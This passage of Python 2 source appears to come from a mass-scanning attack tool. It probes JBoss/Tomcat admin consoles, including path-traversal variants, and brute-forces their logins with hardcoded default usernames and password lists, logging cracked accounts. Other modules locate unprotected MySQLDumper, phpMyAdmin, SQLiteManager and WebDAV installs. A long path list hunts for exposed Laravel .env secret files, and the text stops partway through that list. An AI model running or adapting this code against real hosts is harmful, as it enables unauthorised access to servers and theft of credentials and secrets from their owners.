############################################################# # Scan for Jboss/Tomcat servers having a admin panel and update:29.01.21 # brute for accounts and log them Ports to scan: (8081,8080,8090,8443,3541,8086,9080,) # Brute modded by moep ############################################################# __info__ = {"name" : "jmx", "log_sec_result_file" : "log_jmx2_secured.txt", "log_usec_result_file" : "log_jmx2_unsecured.txt", "log_unknwn_result_file" : "unknwn_results_jmx2.txt", "log_bruted_result_file" : "log_jmx2_bruted.txt", "paths" : ["/jmx-console", "/admin-console/", "/EJBInvokerServlet", "/web-console/AOPBinding.jsp", "/web-console/Invoker", "/jadmin-console/", "/web-console/status", "/HtmlAdaptor?action=inspectMBean&name=jboss.system:type=ServerInfo" "/admin-console/", "/ROOT", "/add", "/balancer", "/dav", "/deploy", "/examples", "/examples/jsp/index.html", "/examples/jsp/snp/snoop.jsp", "/examples/jsp/source.jsp", "/examples/servlet/HelloWorldExample", "/examples/servlet/SnoopServlet", "/examples/servlet/TroubleShooter", "/examples/servlet/default/jsp/snp/snoop.jsp", "/examples/servlet/default/jsp/source.jsp", "/examples/servlet/org.apache.catalina.INVOKER.HelloWorldExample", "/examples/servlet/org.apache.catalina.INVOKER.SnoopServlet", "/examples/servlet/org.apache.catalina.INVOKER.TroubleShooter", "/examples/servlet/org.apache.catalina.servlets.DefaultServlet/jsp/snp/snoop.jsp", "/examples/servlet/org.apache.catalina.servlets.DefaultServlet/jsp/source.jsp", "/examples/servlet/org.apache.catalina.servlets.WebdavServlet/jsp/snp/snoop.jsp", "/examples/servlet/org.apache.catalina.servlets.WebdavServlet/jsp/source.jsp", "/examples/servlet/snoop", "/examples/servlets/index.html", "/examples/../manager/html", "/examples/%2e%2e/manager/html", "/examples/%252e%252e/manager/html", "/host-manager", "/host-manager/add", "/host-manager/host-manager.xml", "/host-manager/html/*", "/host-manager/list", "/host-manager/remove", "/host-manager/start", "/host-manager/stop", "/html/*", "/install", "/j4p", "/jmxproxy/*", "/jsp-examples", "/manager/list", "/manager/manager.xml", "/manager/reload", "/manager/remove", "/manager/resources", "/manager/roles", "/manager/save", "/manager/serverinfo", "/manager/sessions", "/manager/start", "/manager/status.xsd", "/manager/status/*", "/manager/stop", "/manager/undeploy", "/reload", "/remove", "/resources", "/roles", "/save", "/serverinfo", "/servlet/default/", "/servlet/org.apache.catalina.INVOKER.org.apache.catalina.servlets.DefaultServlet/tomcat.gif", "/servlet/org.apache.catalina.INVOKER.org.apache.catalina.servlets.SnoopAllServlet", "/servlet/org.apache.catalina.INVOKER.org.apache.catalina.servlets.WebdavServlet/", "/servlet/org.apache.catalina.servlets.DefaultServlet/", "/servlet/org.apache.catalina.servlets.DefaultServlet/tomcat.gif", "/servlet/org.apache.catalina.servlets.HTMLManagerServlet", "/servlet/org.apache.catalina.servlets.InvokerServlet/org.apache.catalina.servlets.DefaultServlet/tomcat.gif", "/servlet/org.apache.catalina.servlets.InvokerServlet/org.apache.catalina.servlets.SnoopAllServlet", "/servlet/org.apache.catalina.servlets.ManagerServlet", "/servlet/org.apache.catalina.servlets.SnoopAllServlet", "/servlet/org.apache.catalina.servlets.WebdavServlet/", "/servlets-examples", "/sessions", "/start", "/status/*", "/stop", "/tomcat-docs", "/undeploy", "/webdav", "/webdav/index.html", "/webdav/servlet/org.apache.catalina.servlets.WebdavServlet/", "/webdav/servlet/webdav/", "/invoker/JMXInvokerServlet" "/web-console/ServerInfo.jsp" 
"/invoker/", "/JMXInvokerServlet", "/jbossmq-httpil/", "/jbossws/services", "/jmx-console/HtmlAdaptor", "/web-console", "/manager/html", "/jmx-console/HtmlAdaptor?action=inspectMBean&name=jboss.system:type=ServerInfo"], "mark_sec" : ["main Manager page", "&lt;role rolename=\"manager-gui\"/&gt;", "Manager App HOW-TO"], "mark_usec" : ["JBoss JMX Management Console", "x-powered-by jboss", "jboss http.favicon.hash:-656811182"]} tadmins = ['admin', 'both', 'manager', 'role', 'role1' 'root', 'tomcat', 't0mcat'] tpasswords = ['', '102030', '112233', '123', '123123', '1234', '12345', '123456', '1234567', '12345678', '123456789', '1234567890', '1q2w3e4r', '321321', '654321', '666666', 'Password', 'Password1', 'Password12', 'Password123', 'abc123', 'access', 'admin', 'admin01','admin123', 'admin1234', 'admin123456', '[email protected]', 'adminadmin', 'blah', 'both', 'changethis', 'demo', 'demo123', 'hello', 'manager', 'pass', 'pass123', 'pass1234', 'passw0rd', 'password', 'password1', 'password12', 'password123', 'qwert', 'qwerty', 'qwertz', 'qwerty123', 'role', 'root', 's3cret', 'secret', 't0mcat', 'test', 'tomcat', 'toor', 'welcome', 'xmagico', 'zx321654xz'] main_url = tools().create_http_url(ip, port, file = "", prot = "http") #print main_url for path in __info__['paths']: target_url = main_url+path target_return = tools().http_get(None, None, url = target_url) #print target_return[1] if target_return[0] == False: print "Host down" break if target_return[1] == 404: continue #Skip 404 Things target_server_info = tools().get_http_headers(main_url) headers = tools().get_http_headers(main_url) try: headers_server = headers['Server'] except KeyError: headers_server = "Unknown" result_line = "%s Server: %s" %(target_url, headers_server) if target_return[1] == 200 or target_return[1] == 401: #Might be unsecured if any(k in target_return[3] for k in __info__['mark_sec']): for tadmin in tadmins: for tpwd in tpasswords: tpwdx = tpwd.strip() if tools().http_basic_auth(target_url, tadmin, tpwdx)[0] == True: result_line += " Account:" + tadmin + "/" + tpwdx print "[*] JMX (BRUTED):" + target_url + " Login:" + tadmin + ":" + tpwdx tools().logging(__info__['log_bruted_result_file'], result_line) break else: print "[*] JMX Wrong Pass:" + target_url + " Login:" + tadmin + ":" + tpwdx else: print "[*] JMX (SEC):",target_url tools().logging(__info__['log_sec_result_file'], result_line) elif any(k in target_return[3] for k in __info__['mark_usec']): print "[*] JMX (USEC):",target_url tools().logging(__info__['log_usec_result_file'], result_line) else: print "[*] JMX (UKNWN):",target_url tools().logging(__info__['log_unknwn_result_file'], result_line) elif target_return[1] != 404: #Needs Login but can be bruted print "[*] JMX (UNKNWN):",target_url tools().logging(__info__['log_unknwn_result_file'], result_line) def module_scan_jmx3(self, ip, port): ############################################################# # Scan for Jboss/Tomcat servers having a admin panel and update:29.01.21 # brute for accounts and log them Ports to scan: (8081,8080,8090,8443,3541,8086,9080,) # Brute modded by moep ############################################################# __info__ = {"name" : "jmx", "log_sec_result_file" : "log_jmx3_secured.txt", "log_usec_result_file" : "log_jmx3_unsecured.txt", "log_unknwn_result_file" : "unknwn_results_jmx3.txt", "log_bruted_result_file" : "log_jmx3_bruted.txt", "paths" : ["/jmx-console", "/admin-console/", "/EJBInvokerServlet", "/web-console/AOPBinding.jsp", "/web-console/Invoker", "/jadmin-console/", 
"/web-console/status", "/HtmlAdaptor?action=inspectMBean&name=jboss.system:type=ServerInfo" "/admin-console/", "/ROOT", "/add", "/balancer", "/dav", "/deploy", "/examples", "/examples/jsp/index.html", "/examples/jsp/snp/snoop.jsp", "/examples/jsp/source.jsp", "/examples/servlet/HelloWorldExample", "/examples/servlet/SnoopServlet", "/examples/servlet/TroubleShooter", "/examples/servlet/default/jsp/snp/snoop.jsp", "/examples/servlet/default/jsp/source.jsp", "/examples/servlet/org.apache.catalina.INVOKER.HelloWorldExample", "/examples/servlet/org.apache.catalina.INVOKER.SnoopServlet", "/examples/servlet/org.apache.catalina.INVOKER.TroubleShooter", "/examples/servlet/org.apache.catalina.servlets.DefaultServlet/jsp/snp/snoop.jsp", "/examples/servlet/org.apache.catalina.servlets.DefaultServlet/jsp/source.jsp", "/examples/servlet/org.apache.catalina.servlets.WebdavServlet/jsp/snp/snoop.jsp", "/examples/servlet/org.apache.catalina.servlets.WebdavServlet/jsp/source.jsp", "/examples/servlet/snoop", "/examples/servlets/index.html", "/examples/../manager/html", "/examples/%2e%2e/manager/html", "/examples/%252e%252e/manager/html", "/host-manager", "/host-manager/add", "/host-manager/host-manager.xml", "/host-manager/html/*", "/host-manager/list", "/host-manager/remove", "/host-manager/start", "/host-manager/stop", "/html/*", "/install", "/j4p", "/jmxproxy/*", "/jsp-examples", "/manager/list", "/manager/manager.xml", "/manager/reload", "/manager/remove", "/manager/resources", "/manager/roles", "/manager/save", "/manager/serverinfo", "/manager/sessions", "/manager/start", "/manager/status.xsd", "/manager/status/*", "/manager/stop", "/manager/undeploy", "/reload", "/remove", "/resources", "/roles", "/save", "/serverinfo", "/servlet/default/", "/servlet/org.apache.catalina.INVOKER.org.apache.catalina.servlets.DefaultServlet/tomcat.gif", "/servlet/org.apache.catalina.INVOKER.org.apache.catalina.servlets.SnoopAllServlet", "/servlet/org.apache.catalina.INVOKER.org.apache.catalina.servlets.WebdavServlet/", "/servlet/org.apache.catalina.servlets.DefaultServlet/", "/servlet/org.apache.catalina.servlets.DefaultServlet/tomcat.gif", "/servlet/org.apache.catalina.servlets.HTMLManagerServlet", "/servlet/org.apache.catalina.servlets.InvokerServlet/org.apache.catalina.servlets.DefaultServlet/tomcat.gif", "/servlet/org.apache.catalina.servlets.InvokerServlet/org.apache.catalina.servlets.SnoopAllServlet", "/servlet/org.apache.catalina.servlets.ManagerServlet", "/servlet/org.apache.catalina.servlets.SnoopAllServlet", "/servlet/org.apache.catalina.servlets.WebdavServlet/", "/servlets-examples", "/sessions", "/start", "/status/*", "/stop", "/tomcat-docs", "/undeploy", "/webdav", "/webdav/index.html", "/webdav/servlet/org.apache.catalina.servlets.WebdavServlet/", "/webdav/servlet/webdav/", "/invoker/JMXInvokerServlet" "/web-console/ServerInfo.jsp" "/invoker/", "/JMXInvokerServlet", "/jbossmq-httpil/", "/jbossws/services", "/jmx-console/HtmlAdaptor", "/web-console", "/manager/html", "/jmx-console/HtmlAdaptor?action=inspectMBean&name=jboss.system:type=ServerInfo"], "mark_sec" : ["main Manager page", "&lt;role rolename=\"manager-gui\"/&gt;", "Manager App HOW-TO"], "mark_usec" : ["JBoss JMX Management Console", "x-powered-by jboss", "jboss http.favicon.hash:-656811182"]} tadmins = ['admin', 'both', 'manager', 'role', 'role1' 'root', 'tomcat', 't0mcat'] tpasswords = open('passwords_unix.txt', 'r').read().splitlines() main_url = tools().create_http_url(ip, port, file = "", prot = "http") for path in __info__['paths']: target_url = 
main_url+path target_return = tools().http_get(None, None, url = target_url) #print target_return[1] if target_return[0] == False: print "Host down" break if target_return[1] == 404: continue #Skip 404 Things target_server_info = tools().get_http_headers(main_url) headers = tools().get_http_headers(main_url) try: headers_server = headers['Server'] except KeyError: headers_server = "Unknown" result_line = "%s Server: %s" %(target_url, headers_server) if target_return[1] == 200 or target_return[1] == 401: #Might be unsecured if any(k in target_return[3] for k in __info__['mark_sec']): for tadmin in tadmins: for tpwd in tpasswords: if tools().http_basic_auth(target_url, tadmin, tpwd)[0] == True: result_line += " Account:" + tadmin + "/" + tpwd print "[*] JMX (BRUTED):" + target_url + " Login:" + tadmin + ":" + tpwd tools().logging(__info__['log_bruted_result_file'], result_line) break else: print "[*] JMX Wrong Pass:" + target_url + " Login:" + tadmin + ":" + tpwd else: print "[*] JMX (SEC):",target_url tools().logging(__info__['log_sec_result_file'], result_line) elif any(k in target_return[3] for k in __info__['mark_usec']): print "[*] JMX (USEC):",target_url tools().logging(__info__['log_usec_result_file'], result_line) else: print "[*] JMX (UKNWN):",target_url tools().logging(__info__['log_unknw_result_file'], result_line) elif target_return[1] != 404: #Needs Login but can be bruted print "[*] JMX (UNKNWN):",target_url tools().logging(__info__['log_unknw_result_file'], result_line) def module_scan_mysqldumper(self, ip, port): ############################################################# # Scan Hosts for installed MySQLDumper and log them ############################################################# __info__ = {"name" : "mysqldumper", "log_usec_result_file" : "usec_result_msd.txt", "log_sec_result_file" : "sec_results_msd.txt", "log_unknwn_result_file" : "unknwn_results_msd.txt", "paths" : ["/Dumper", "/MSD", "/MySQL", "/MySQLDumper", "/dumper", "/msd", "/msd1.24.4", "/msd1.24stable", "/mySQLDumper", "/mySQLmanager", "/mySqlDumper", "/mysql", "/mysqldumper", "/sql", "/sqladmin", "/sqlmanager", "/sqlweb", "/websql"]} main_url = tools().create_http_url(ip, port, file = "", prot = "http") #print main_url for path in __info__['paths']: target_url = main_url+path target_return = tools().http_get(None, None, url = target_url) if target_return[0] == False: print "Host down" break if target_return[1] == 200: #Might be unsecured if target_return[3].find("<title>MySQLDumper</title>") != -1: print "[*] MSD (USEC):",target_url tools().logging(__info__['log_usec_result_file'], target_url) else: tools().logging(__info__['log_unknwn_result_file'], target_url) elif target_return[1] == 203: #Might be protected with htaccess print "[*] MSD (SEC):",target_url tools().logging(__info__['log_sec_result_file'], target_url) def module_scan_phpmyadmin(self, ip, port): ############################################################# # Scan Hosts for phpmyadmin and log them ############################################################# __info__ = {"name" : "phpmyadmin", "log_usec_result_file" : "usec_result_pma.txt", "log_sec_result_file" : "sec_results_pma.txt", "log_unknwn_result_file" : "unknwn_results_pma.txt", "paths" : ["/phpmyadmin", "/phpMyAdmin", "/mysql", "/sql", "/myadmin", "/phpMyAdmin-4.2.1-all-languages", "/phpMyAdmin-4.2.1-english", "/xampp/phpmyadmin", "/typo3/phpmyadmin", "/webadmin"], "mark_usec" : ["<li id=\"li_server_info\">Server: ", "src=\"navigation.php", "src=\"main.php"], "mark_sec" : 
["www.phpmyadmin.net", "input_username", "pma_username", "pma_password", "src=\"main.php?token="], "mark_blacklist" : ["<?php", "<?"]} main_url = tools().create_http_url(ip, port, file = "", prot = "http") #print main_url for path in __info__['paths']: target_url = main_url+path target_return = tools().http_get(None, None, url = target_url) if target_return[0] == False: print "Host down" break if target_return[1] == 200: #Might be unsecured #print target_return[3] # Check with k not in ... mark_fuzzed that the pma is not fucked up ;) if any(k in target_return[3] for k in __info__['mark_usec']) and any(k not in target_return[3] for k in __info__['mark_blacklist']): print "[*] PMA (USEC):",target_url tools().logging(__info__['log_usec_result_file'], target_url) elif any(k in target_return[3] for k in __info__['mark_sec']) and any(k not in target_return[3] for k in __info__['mark_blacklist']): print "[*] PMA (SEC):",target_url tools().logging(__info__['log_sec_result_file'], target_url) else: print "[*] PMA (UKNWN):",target_url tools().logging(__info__['log_unknwn_result_file'], target_url) elif target_return[1] == 203: #Might be protected with htaccess print "[*] PMA (SEC):",target_url tools().logging(__info__['log_sec_result_file'], target_url) def module_scan_sqlitemanager(self, ip, port): ############################################################# # Scan for sqlitemanager and log them ############################################################# __info__ = {"name" : "sqlitemanager", "log_result_file" : "log_sqlitemanager.txt", "log_unknwn_result_file" : "unknwn_results_sqlitemanager.txt", "paths" : ["/sqlite", "/SQLite/SQLiteManager-1.2.4", "/SQLiteManager-1.2.4", "/sqlitemanager", "/SQlite", "/SQLiteManager"], "marks" : ["Create or add new database", "<h2 class=\"sqlmVersion\">Welcome to", "http://www.sqlitemanager.org"],} main_url = tools().create_http_url(ip, port, file = "", prot = "http") main_server_info = tools().get_http_headers(main_url) #print main_url for path in __info__['paths']: target_url = main_url+path+"/main.php" target_return = tools().http_get(None, None, url = target_url) #print target_return[3] if target_return[1] == 200: result_line = "%s Server: %s" %(target_url, main_server_info['Server']) if any(k in target_return[3] for k in __info__['marks']): sys.stdout.write("[*] Sqlitemanager: %s\n" %target_url) tools().logging(__info__['log_result_file'], result_line) else: tools().logging(__info__['log_unknwn_result_file'], result_line) def module_scan_webdav(self, ip, port): ############################################################# # Scan for webdav and log them ############################################################# __info__ = {"name" : "webdav", "log_result_file" : "log_webdav.txt", "log_unknwn_result_file" : "unknwn_results_webdav.txt", "paths" : ["/webdav"], "mark_xampp" : ["<b>WebDAV testpage</b>"]} main_url = tools().create_http_url(ip, port, file = "", prot = "http") #print main_url for path in __info__['paths']: target_url = main_url+path target_return = tools().http_get(None, None, url = target_url) #print target_return[1] if target_return[0] == False: print "Host down" break if target_return[1] == 404: continue #Skip 404 Things target_server_info = tools().get_http_headers(main_url) headers = tools().get_http_headers(main_url) try: headers_server = headers['Server'] except KeyError: headers_server = "Unknown" result_line = "%s Server: %s" %(target_url, headers_server) if target_return[1] == 200 or target_return[1] == 401: if any(k in target_return[3] 
for k in __info__['mark_xampp']): print "[*] WebDAV (TRUE):", target_url tools().logging(__info__['log_result_file'], result_line) else: tools().logging(__info__['log_unknwn_result_file'], result_line) elif target_return[1] != 404: #Needs Login but can be bruted print "[*] WebDAV (UNKNWN):",target_url tools().logging(__info__['log_unknwn_result_file'], result_line) def module_scan_laravel(self, ip, port): ############################################################# #Scan for laravel by [email protected]@R-LightS ############################################################# __info__ = {"name" : "laravel", "log_result_file" : "log_laravel.txt", "log_unknwn_result_file" : "unknwn_results_laravel.txt", "paths" : [ "/.env", "/__tests__/test-become/.env", "/_static/.env", "/.c9/metadata/environment/.env", "/.docker/.env", "/.docker/laravel/app/.env", "/.env.backup", "/.env.dev", "/.env.development.local", "/.env.docker.dev", "/.env.example", "/.env.local", "/.env.php", "/.env.prod", "/.env.production.local", "/.env.sample.php", "/.env.save", "/.env.stage", "/.env.test", "/.env.test.local", "/.env~", "/.gitlab-ci/.env", "/.vscode/.env", "/3-sequelize/final/.env", "/07-accessing-data/begin/vue-heroes/.env", "/07-accessing-data/end/vue-heroes/.env", "/08-routing/begin/vue-heroes/.env", "/08-routing/end/vue-heroes/.env", "/09-managing-state/begin/vue-heroes/.env", "/09-managing-state/end/vue-heroes/.env", "/31_structure_tests/.env", "/acme_challenges/.env", "/acme-challenge/.env", "/acme/.env", "/actions-server/.env", "/admin-app/.env", "/admin/.env", "/adminer/.env", "/administrator/.env", "/agora/.env", "/alpha/.env", "/anaconda/.env", "/api/.env", "/api/src/.env", "/app_dir/.env", "/app_nginx_static_path/.env", "/app-order-client/.env", "/app/.env", "/app/client/.env", "/app/code/community/Nosto/Tagging/.env", "/app/config/.env", "/app/config/dev/.env", "/app/frontend/.env", "/app1-static/.env", "/app2-static/.env", "/apps/.env", "/apps/client/.env", "/Archipel/.env", "/asset_img/.env", "/assets/.env", "/Assignment3/.env", "/Assignment4/.env", "/audio/.env", "/awstats/.env", "/babel-plugin-dotenv/test/fixtures/as-alias/.env", "/babel-plugin-dotenv/test/fixtures/default/.env", "/babel-plugin-dotenv/test/fixtures/dev-env/.env", "/babel-plugin-dotenv/test/fixtures/empty-values/.env", "/babel-plugin-dotenv/test/fixtures/filename/.env", "/babel-plugin-dotenv/test/fixtures/override-value/.env", "/babel-plugin-dotenv/test/fixtures/prod-env/.env", "/back-end/app/.env", "/back/.env", "/backend/.env", "/backend/src/.env", "/backendfinaltest/.env", "/backup/.env", "/base_dir/.env", "/basic-network/.env", "/bgoldd/.env", "/bitcoind/.env", "/blankon/.env", "/blob/.env", "/blog/.env", "/blue/.env", "/bookchain-client/.env", "/bootstrap/.env", "/boxes/oracle-vagrant-boxes/ContainerRegistry/.env", "/boxes/oracle-vagrant-boxes/Kubernetes/.env", "/boxes/oracle-vagrant-boxes/OLCNE/.env", "/bucoffea/.env", "/build/.env", "/cardea/backend/.env", "/cdw-backend/.env", "/cgi-bin/.env", "/ch2-mytodo/.env", "/ch6-mytodo/.env", "/ch6a-mytodo/.env", "/ch7-mytodo/.env", "/ch7a-mytodo/.env", "/ch8-mytodo/.env", "/ch8a-mytodo/.env", "/ch8b-mytodo/.env", "/Chai/.env", "/challenge/.env", "/challenges/.env", "/charts/liveObjects/.env", "/chat-client/.env", "/chiminey/.env", "/client-app/.env", "/client/.env", "/client/mutual-fund-app/.env", "/client/src/.env", "/ClientApp/.env", "/clld_dir/.env", "/cmd/testdata/expected/dot_env/.env", "/code/api/.env", "/code/web/.env", "/CodeGolf.Web/ClientApp/.env", "/codenames-frontend/.env", 
"/collab-connect-web-application/server/.env", "/collected_static/.env", "/community/.env", "/conf/.env", "/config/.env", "/ContainerRegistry/.env", "/content/.env", "/core/.env", "/core/app/.env", "/core/Datavase/.env", "/core/persistence/.env", "/core/src/main/resources/org/jobrunr/dashboard/frontend/.env", "/counterblockd/.env", "/counterwallet/.env", "/cp/.env", "/cron/.env", "/cronlab/.env", "/cryo_project/.env", "/css/.env", "/custom/.env", "/d/.env", "/data/.env", "/database/.env", "/dataset1/.env", "/dataset2/.env", "/default/.env", "/delivery/.env", "/demo-app/.env", "/demo/.env", "/deploy/.env", "/developerslv/.env", "/development/.env", "/directories/.env", "/dist/.env", "/django_project_path/.env", "/django-blog/.env", "/django/.env", "/doc/.env", "/docker-compose/platform/.env", "/docker-elk/.env", "/docker-network-healthcheck/.env", "/docker-node-mongo-redis/.env", "/docker/.env", "/docker/app/.env", "/docker/compose/withMongo/.env", "/docker/compose/withPostgres/.env", "/docker/database/.env", "/docker/db/.env", "/docker/examples/compose/.env", "/docker/postgres/.env", "/docker/webdav/.env", "/docs/.env", "/dodoswap-client/.env", "/dotfiles/.env", "/download/.env", "/downloads/.env", "/e2e/.env", "/en/.env", "/engine/.env", "/env/.env", "/env/dockers/mariadb-test/.env", "/env/dockers/php-apache/.env", "/env/example/.env", "/env/template/.env", "/environments/local/.env", "/environments/production/.env", "/error/.env", "/errors/.env", "/example/.env", "/example02-golang-package/import-underscore/.env", "/example27-how-to-load-env/sample01/.env", "/example27-how-to-load-env/sample02/.env", "/examples/.env", "/examples/01-simple-model/.env", "/examples/02-complex-example/.env", "/examples/03-one-to-many-relationship/.env", "/examples/04-many-to-many-relationship/.env", "/examples/05-migrations/.env", "/examples/06-base-service/.env", "/examples/07-feature-flags/.env", "/examples/08-performance/.env", "/examples/09-production/.env", "/examples/10-subscriptions/.env", "/examples/11-transactions/.env", "/examples/drupal-separate-services/.env", "/examples/react-dashboard/backend/.env", "/examples/sdl-first/.env", "/examples/sdl-first/prisma/.env", "/examples/vue-dashboard/backend/.env", "/examples/web/.env", "/examples/with-cookie-auth-fauna/.env", "/examples/with-dotenv/.env", "/examples/with-firebase-authentication-serverless/.env", "/examples/with-react-relay-network-modern/.env", "/examples/with-relay-modern/.env", "/examples/with-universal-configuration-build-time/.env", "/exapi/.env", "/Exercise.Frontend/.env", "/Exercise.Frontend/train/.env", "/export/.env", "/fastlane/.env", "/favicons/.env", "/favs/.env", "/FE/huey/.env", "/fedex/.env", "/fhir-api/.env", "/files/.env", "/fileserver/.env", "/films/.env", "/Final_Project/Airflow_Dag/.env", "/Final_Project/kafka_twitter/.env", "/Final_Project/StartingFile/.env", "/finalVersion/lcomernbootcamp/projbackend/.env", "/FIRST_CONFIG/.env", "/first-network/.env", "/fisdom/fisdom/.env", "/fixtures/blocks/.env", "/fixtures/fiber-debugger/.env", "/fixtures/flight/.env", "/fixtures/kitchensink/.env", "/flask_test_uploads/.env", "/fm/.env", "/font-icons/.env", "/fonts/.env", "/front-app/.env", "/front-empathy/.env", "/front-end/.env", "/front/.env", "/front/src/.env", "/frontend/.env", "/frontend/momentum-fe/.env", "/frontend/react/.env", "/frontend/vue/.env", "/frontendfinaltest/.env", "/ftp/.env", "/ftpmaster/.env", "/gists/cache", "/gists/laravel", "/gists/pusher", "/github-connect/.env", "/grems-api/.env", "/grems-frontend/.env", 
"/Hash/.env", "/hasura/.env", "/Helmetjs/.env", "/hgs-static/.env", "/higlass-website/.env", "/home/.env", "/horde/.env", "/hotpot-app-frontend/.env", "/htdocs/.env", "/html/.env", "/http/.env", "/httpboot/.env", "/HUNIV_migration/.env", "/icon/.env", "/icons/.env", "/ikiwiki/.env", "/image_data/.env", "/Imagebord/.env", "/images/.env", "/img/.env", "/install/.env", "/InstantCV/server/.env", "/items/.env", "/javascript/.env", "/js-plugin/.env", "/js/.env", "/jsrelay/.env", "/jupyter/.env", "/khanlinks/.env", "/kibana/.env", "/kodenames-server/.env", "/kolab-syncroton/.env", "/Kubernetes/.env", "/lab/.env", "/laravel/.env", "/latest/.env", "/layout/.env", "/lcomernbootcamp/projbackend/.env", "/leafer-app/.env", "/ledger_sync/.env", "/legacy/tests/9.1.1", "/legacy/tests/9.2.0", "/legal/.env", "/lemonldap-ng-doc/.env", "/lemonldap-ng-fr-doc/.env", "/letsencrypt/.env", "/lib/.env", "/Library/.env", "/libs/.env", "/linux/.env", "/local/.env", "/log/.env", "/logging/.env", "/login/.env", "/mail/.env", "/mailinabox/.env", "/mailman/.env", "/main_user/.env", "/main/.env", "/manual/.env", "/master/.env", "/media/.env", "/memcached/.env", "/mentorg-lava-docker/.env", "/micro-app-react-communication/.env", "/micro-app-react/.env", "/mindsweeper/gui/.env", "/minified/.env", "/misc/.env", "/Modix/ClientApp/.env", "/monerod/.env", "/mongodb/config/dev/.env", "/monitoring/compose/.env", "/moodledata/.env", "/msks/.env", "/munki_repo/.env", "/music/.env", "/MyRentals.Web/ClientApp/.env", "/name/.env", "/new-js/.env", "/news-app/.env", "/nginx-server/.env", "/nginx/.env", "/niffler-frontend/.env", "/node_modules/.env", "/Nodejs-Projects/play-ground/login/.env", "/Nodejs-Projects/play-ground/ManageUserRoles/.env", "/noVNC/.env", "/Nuke.App.Ui/.env", "/oldsanta/.env", "/ops/vagrant/.env", "/option/.env", "/orientdb-client/.env", "/outputs/.env", "/owncloud/.env", "/packages/api/.env", "/packages/app/.env", "/packages/client/.env", "/packages/frontend/.env", "/packages/plugin-analytics/src/fixtures/analytics-ga-key/.env", "/packages/plugin-qiankun/examples/app1/.env", "/packages/plugin-qiankun/examples/app2/.env", "/packages/plugin-qiankun/examples/app3/.env", "/packages/plugin-qiankun/examples/master/.env", "/packages/react-scripts/fixtures/kitchensink/template/.env", "/packages/styled-ui-docs/.env", "/packages/web/.env", "/packed/.env", "/page-editor/.env", "/parity/.env", "/Passportjs/.env", "/patchwork/.env", "/path/.env", "/pfbe/.env", "/pictures/.env", "/playground/.env", "/plugin_static/.env", "/post-deployment/.vscode/.env", "/postfixadmin/.env", "/price_hawk_client/.env", "/prisma/.env", "/private/.env", "/processor/.env", "/prod/.env", "/projbackend/.env", "/project_root/.env", "/psnlink/.env", "/pt2/countries/src/.env", "/pt8/library-backend-gql/.env", "/pub/.env", "/public_html/.env", "/public_root/.env", "/public/.env", "/question2/.env", "/qv-frontend/.env", "/rabbitmq-cluster/.env", "/rails-api/react-app/.env", "/rasax/.env", "/react_todo/.env", "/redmine/.env", "/repo/.env", "/repos/.env", "/repository/.env", "/resources/.env", "/resources/docker/.env", "/resources/docker/mysql/.env", "/resources/docker/phpmyadmin/.env", "/resources/docker/rabbitmq/.env", "/resources/docker/rediscommander/.env", "/resourcesync/.env", "/rest/.env", "/restapi/.env", "/results/.env", "/robots/.env", "/root/.env", "/rosterBack/.env", "/roundcube/.env", "/roundcubemail/.env", "/routes/.env", "/run/.env", "/rust-backend/.env", "/rust-backend/dao/.env", "/s-with-me-front/.env", "/saas/.env", 
"/samples/chatroom/chatroom-spa/.env", "/samples/docker/deploymentscripts/.env", "/script/.env", "/scripts/.env", "/scripts/fvt/.env", "/selfish-darling-backend/.env", "/Serve_time_server/.env", "/serve-browserbench/.env", "/Server_with_db/.env", "/server/.env", "/server/config/.env", "/server/laravel/.env", "/server/src/persistence/.env", "/services/adminer/.env", "/services/deployment-agent/.env", "/services/documents/.env", "/services/graylog/.env", "/services/jaeger/.env", "/services/minio/.env", "/services/monitoring/.env", "/services/portainer/.env", "/services/redis-commander/.env", "/services/registry/.env", "/services/simcore/.env", "/services/traefik/.env", "/sessions/.env", "/shared/.env", "/shibboleth/.env", "/shop/.env", "/Simple_server/.env", "/site-library/.env", "/site/.env", "/sitemaps/.env", "/sites/.env", "/sitestatic/.env", "/Socketio/.env", "/sources/.env", "/Sources/API/.env", "/spearmint/.env", "/spikes/config-material-app/.env", "/SpotiApps/.env", "/src/__tests__/__fixtures__/instanceWithDependentSteps/.env", "/src/__tests__/__fixtures__/typeScriptIntegrationProject/.env", "/src/__tests__/__fixtures__/typeScriptProject/.env", "/src/__tests__/__fixtures__/typeScriptVisualizeProject/.env", "/src/.env", "/src/add-auth/express/.env", "/src/assembly/.env", "/src/character-service/.env", "/src/client/mobile/.env", "/src/core/tests/dotenv-files/.env", "/src/gameprovider-service/.env", "/src/main/front-end/.env", "/src/main/resources/archetype-resources/__rootArtifactId__-acceptance-test/src/test/resources/app-launcher-tile/.env", "/src/renderer/.env", "/srv6_controller/controller/.env", "/srv6_controller/examples/.env", "/srv6_controller/node-manager/.env", "/st-js-be-2020-movies-two/.env", "/stackato-pkg/.env", "/static_prod/.env", "/static_root/.env", "/static_user/.env", "/static-collected/.env", "/static-html/.env", "/static-root/.env", "/static/.env", "/staticfiles/.env", "/stats/.env", "/storage/.env", "/style/.env", "/styles/.env", "/stylesheets/.env", "/symfony/.env", "/system-config/.env", "/system/.env", "/target/.env", "/temanr9/.env", "/temanr10/.env", "/temp/.env", "/template/.env", "/templates/.env", "/test-network/.env", "/test-network/addOrg3/.env", "/test/.env", "/test/aries-js-worker/fixtures/.env", "/test/bdd/fixtures/adapter-rest/.env", "/test/bdd/fixtures/agent-rest/.env", "/test/bdd/fixtures/couchdb/.env", "/test/bdd/fixtures/demo/.env", "/test/bdd/fixtures/demo/openapi/.env", "/test/bdd/fixtures/did-method-rest/.env", "/test/bdd/fixtures/did-rest/.env", "/test/bdd/fixtures/edv-rest/.env", "/test/bdd/fixtures/openapi-demo/.env", "/test/bdd/fixtures/sidetree-mock/.env", "/test/bdd/fixtures/universalresolver/.env", "/test/bdd/fixtures/vc-rest/.env", "/test/fixtures/.env", "/test/fixtures/app_types/node/.env", "/test/fixtures/app_types/rails/.env", "/test/fixtures/node_path/.env", "/test/integration/env-config/app/.env", "/testfiles/.env", "/testing/docker/.env", "/tests/.env", "/Tests/Application/.env", "/tests/default_settings/v7.0/.env", "/tests/default_settings/v8.0/.env", "/tests/default_settings/v9.0/.env", "/tests/default_settings/v10.0/.env", "/tests/default_settings/v11.0/.env", "/tests/default_settings/v12.0/.env", "/tests/default_settings/v13.0/.env", "/tests/drupal-test/.env", "/tests/Integration/Environment/.env", "/tests/todo-react/.env", "/testwork_json/.env", "/theme_static/.env", "/theme/.env", "/thumb/.env", "/thumbs/.env", "/tiedostot/.env", "/tmp/.env", 